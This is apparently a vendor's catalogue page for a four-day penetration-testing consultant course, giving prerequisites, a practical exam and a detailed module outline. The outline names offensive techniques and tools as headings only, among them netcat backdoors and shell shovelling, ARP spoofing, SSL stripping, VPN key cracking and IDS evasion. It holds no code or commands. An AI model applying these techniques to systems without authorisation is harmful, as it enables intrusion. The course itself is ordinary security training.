mile2® Store

Certified Penetration Testing Consultant

  • Print
Key Data
 Certified Penetration Testing Consultant Course Description

Course Name: C)PTC 

Duration: 4 days

Language: English

Format:
• Instructor-led classroom (Lecture and Labs)

Prerequisites:
• C)PTE, GIAC, or equivalent knowledge
• A minimum of 24 months experience in Networking Technologies
• Sound knowledge of TCP/IP
• Computer hardware knowledge
• Experience as a Support Professional or Consultant

Student Materials:
• Student Workbook
• Student Reference Manual
• Software/Tools 2x DVD& Definitions Book

Certification Exam:
• C)PTC – Practical Exam

Certification Track:
• C)PTE – Certified Pen Testing Engineer™
• C)PTC - Certified Pen Testing Consultant™
• C)SWAE – Certified Secure Web Application Engineer

 

The Certified Penetration Testing Consultant course is designed for Cyber Security Professionals and IT Network Administrators who are interested in conducting Penetration tests against large network infrastructures similar to large corporate networks, Services Providers and Telecommunication Companies. Instead of focusing on Operating System level penetration testing, this course covers techniques on how to attack and prevent underlying network infrastructure and protocols.

 

The training starts from basic packet capturing and analyzing by using common tools and continues with Layer2 attack vectors, Layer3 based attacks; including both IPv4 and IPv6 stacks, routing protocol attacks (OSPF, BGP, etc) and then jumps over to Service Provider level attacks related with very common used MPLS, how to use relays and pivots, VPN attacks including IPSEC protocol suite, SSL attacks, and finally covers NIDS/NIPS evasion and implementation techniques.

 

At the completion of each module, students are going to be able to practice their knowledge with the lab exercises that are specifically prepared for the covered materials during the theory.

UPON COMPLETION

A Certified Penetration Testing Consultant is a cyber security professional with the ability to plan, manage and perform a penetration test. The designation “Consultant” is related to the depth and breadth of understanding required to manage a project involving multiple team members, manage the client’s expectations and deliver an audit of security controls that is thorough, well documented and ethically sound.


COURSE DETAILS

Module 0:  C)PTC Intro
Module 1:  Packet Capturing
Module 2:  Layer 2 Attacks
Module 3:  Layer 3 Attacks on Cisco Based Infrastructures & Enumeration
Module 4:  Pivoting and Relays
Module 5:  IPv6 Attacks
Module 6:  VPN Attacks
Module 7:  Defeating SSL
Module 8:  IDS/IPS Evasion


LABORATORY EXERCISES

Lab 1:  Working with Captured Files
Lab 2:  Layer 2 Attacks
Lab 3:  Attacking Routing Protocol
Lab 4: Using Pivot Machines
Lab 5:  IPv6 Attacks
Lab 6:  VPN Attacks
Lab 7:  Defeating SSL –Decrypting Traffic and Man-in-the-middle attacks
Lab 8: NIDS/NIPS


OBJECTIVE OF HANDS-ON LABORATORY SCENARIOS

This is an intensive hands-on class. Students may spend 20 hours or more performing labs that walk them through a real world Pen Testing model. Labs begin with simple activities and move on to more complex procedures. During labs, students move through a detailed Lab Guide containing screen shots, commands to be typed, and steps students should take. Students will make use of scores of traditional and cutting edge Pen Testing tools (GUI and command line, Windows and Linux) as they make their way through mile2’s time-tested methodology. (See Outline below for tool titles) Customers can be confident that as new methods arise in the security world; our labs are updated to reflect them.

 
CERTIFIED PENETRATION TESTING CONSULTANT EXAM

The Certified Penetration Testing Consultant exam is a 6 hour practical in which you will be conducting both a Vulnerability Assessment and a Full Penetration Test on two IP's. You will then be given 60 days to turn in a written Penetration Test report that will be analyzed by our team of experts. You are required to find at least 80% of the vulnerabilities and then manually test to see if they are legitimate. The report will need to be professionally written, grammatically correct and accurate. This exam is a Pass or Fail.

Module 1: Packet Capturing

Packet Capturing

Packet capturing using libpcap

Capturing using ncap

Packet Capturing Software

Windump / TCPDump

Usage

Usage

Windump & PS

Wireshark

General Settings

Preferences

Capture Settings

Interface Options

Column Settings

Name Resolution Settings

Panes

Capture Options

Menu Shortcuts

Follow TCP Stream

Expert Infos

Packet Reassembly

Capturing VOIP Calls

VOIP Call Filtering

Call Setup

Playing the call

Saving the call into a file

SMB Export

HTTP Export


Module 2: Layer2 Attacks

Why Layer2?

FBI/CSI Risk Assessment

Ethernet Frame Formats

Different Types of attacks

Switch Learning Process

Excessive Flooding

Macof

Cisco Switches’ Bridging Table Capacities

Mac Flooding Alternative: Mac Spoofing Attacks

Spanning Tree Basics

Frame Formats

Dissectoring

Main BPDU Formats

yersinia

STP Attacks supported in yersinia

Becoming Root Bridge

VLANs

Basic Trunk Port Defined

Dynamic Trunking Protocol (Cisco)

VLAN Hopping Attack

Double Tagging

How DHCP operates?

DHCP Request/Reply Types

DHCP Fields

DHCP Starvation Attack

Rogue DHCP Server Attack

ARP Function Review

Risk Analysis of ARP

ARP Spoofing Attack Tools

ARP Cache Poisoning

How PoE works?       

Risk Analysis for PoE

 

 

 

Module 3: Layer3 Attacks on Cisco Based Infrastructures

Layer 3 protocols

Protocols: BGP

BGP MD5 crack

Protocols: BGP

BGP Route Injection

MP-BGP Route Injection

Protocols: OSPF

Protocols: ISIS

Protocols: HSRP/VRRP

DDoS detection

DDoS prevention

Ingress/egress filtering

Worm detection and protection

DDoS/worm research/future

MPLS

Bi-directional MPLS-VPN traffic redirection

Some More MPLS Attacks

MPLS

Router integrity checking

 

 


Module 4: Pivoting and Relays

Pivoting

Netcat

Backdoors with nc

Netcat – Basic Usage

Persistent Listeners

Shovel a shell

Shovel a file

netcat port scanner

Relays

Simple Netcat Relay

Two-Way Netcat Relay – The Newbie Approach

Named Pipes

I/O Streams and Redirection

Relay Scenario 1

Two-Way NC Relay with Named Pipe

Relay Scenario 2

Relay Scenario 3

 

Module 5: IPv6 Attacks

IPv4

IPv6

IPv4 & IPv6 Headers

IPv6 Header Format

End-to-End Principle

Differences with End-to-End

End point filters

Merging IPSEC and Firewall functions

Scanning

ICMPv6

ICMPv6 Neighbor Discovery

IPv6 Attack Tools

DAD DoS Attack

DAD DoS Attack

Auto-Configuration Mechanisms

Autoconfiguration – SLAAC, DHCPv6

Auto-Configuration IPv4 & IPv6

ICMPv6 Types

Neighbor Discovery

ND spoofing

http://www.thc.org/thc-ipv6

Dos-new-ipv6 (THC)

Parasite6 (THC)

Redir6 (THC)

Fake_router6

IPv6 in Today’s Network

Extension Headers

Routing Header

Different Types of Routing Header

RH0 (Deprecated by RFC 5095) Format

Routing Header 0 Attack

Layer 3-4 Spoofing

Transition Mechanism Threats

IPv6 Firewalls

Making existing tools work

Summary

 

 


Module 6: VPN Attacks

VPNs

VPN Comparison

IPSec

Detecting IPSec VPNs

AH versus ESP

Tunnel mode versus Transport mode

Main mode versus aggressive mode

IKE Main Mode

IKE Aggressive Mode

IPv4 Header

Authentication Header

AH Transport Mode

AH Tunnel Mode

Authentication Algorithms

AH and NAT

ESP with Authentication

ESP in Transport Mode

ESP in Tunnel Mode

IKE

IKE-Scan

IKE-SCAN

Aggressive Mode

Main Mode

Aggressive Mode ID

Aggressive Mode PSK Attacks

Aggressive PSK Cracking

Aggressive Mode ID Enumeration

Main Mode PSK Attacks

Main Mode PSK Cracking

Main Mode Policy Enumeration

IKECrack

IKEProbe

IKE-PROBE

Other VPN Flaws

Insecure Storage of Credentials on VPN Clients

Username Enumeration

 


Module 7: Defeating SSL

Outline

How SSL Works

Certificate Types

Certificate Chaining

Chain of trust

Verifying a Certificate Chain

Certificate Chain That Cannot be Verified

What if…

Basic Constraints

Then the story started

SSLSNIFF

Running SSLSNIFF

Setting up IPTABLES

Running Arpspoof      

SSLSTRIP

How SSL connection is initiated:

SSLSTRIP

How does it look like?

With SSLSTRIP

Running SSLSTRIP

Combining this technique with homograph attack

Certificates

Certificate Enrollment Request PKCS#10

Certificate (Subjects)

CN Encoding

PKCS #10 SUBJECT

PKCS #10 Certificate Signing Request

Disadvantages

Universal Wildcard

More Weird Stuff

What do we have to worry about?

Certificate Revocation

Defeating OCSP

OCSP-Aware SSLSNIFF

Updates

Update-Aware SSLSNIFF

Snort

What is Snort?

Snort Architecture

Packet Sniffing

Preprocessors

Detection Engine

Alerting Components

Three major modes

Using Snort as Packet Sniffer

Packet Sniffing

Snort as Packet Logger

Snort as NIDS

Snort Rule Tree

Decoding Ethernet Packet

Preprocessor Layout

Parts of a Rule Outputs


Module 8: IDS/IPS Evasion

Evasion

Networking Standards

Evasion Principles

Evasion Layers

Layer 2           

Layer 3-4

Fragmentation

Fragmentation Attacks – Ping O' Death

More Malicious Fragments

Fragmentation-Based Techniques

Sending Overlapping Fragments

Different Reassembly Timeout

Sending Fragment with Different TTLs

Insertion Attacks

Protocol Violation

Layer 5-7

Layer 5-7

SMB Evasions

SMB based vulnerabilities

How can IDS control SMB sessions?

DCERPC Evasions

How DCERPC works:

DCERPC Bind Evasions

DCERPC Call Evasions

DCERPC Transport Evasions

Obfuscation

Client Side Attack Evasions

Unicode

UTF-8 Overlong Strings

Javascript Evasions

Base64 your HTML

Encryption

DoS Attacks

Failure Points

Alert Management

Hardware Limitations

Session Tracking

Pattern Matching

Signature Matching

 

Register For This Class

buy-now-icons-question

        

 

 

Also available as:

LIVE REMOTE TRAINING

Attend live class from anywhere in the world!

·      Live presentations with powerful functionality that delivers easy viewing of slides and other documents, shared Internet access, virtual whiteboard, and a media center all through an easy-to-use toolbar.

·      Application, file, and desktop sharing enable you to view live demonstrations.

·      Dedicated high spec remote PC per student with full access as if you are sitting in-front of the PC in the classroom.

·      Instructor views each students session when you perform your hands on labs, the instructor can access your remote system to demonstrate and assist while you sit back to absorb the classroom style mentoring you expect.

·      Public and private text chat allows for increased interactivity between students and instructor

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

·         Course Name: CPTC V3

·         Duration:   4 days

·         Language:  English

·         Format:

Instructor-led Course (Lecture and Labs)

·         Prerequisites:

·         CPTE, GIAC, or equivalent knowledge

·         A minimum of 24 months experience in Networking Technologies

·         Sound knowledge of TCP/IP

·         Computer hardware knowledge

·         Experience as a Support Professional or Consultant

·         Student Materials:

1.     Student Workbook

2.     Student Reference Manual

3.     Software/Tools 2x DVDs

·         Certification Exam:

·         CPTC – Practical Exam

·         Certification Track:

CPTE – Certified Pen Testing Engineer™

CPTC - Certified Pen Testing Consultant™

CSWAE – Certified Secure Web Application Engineer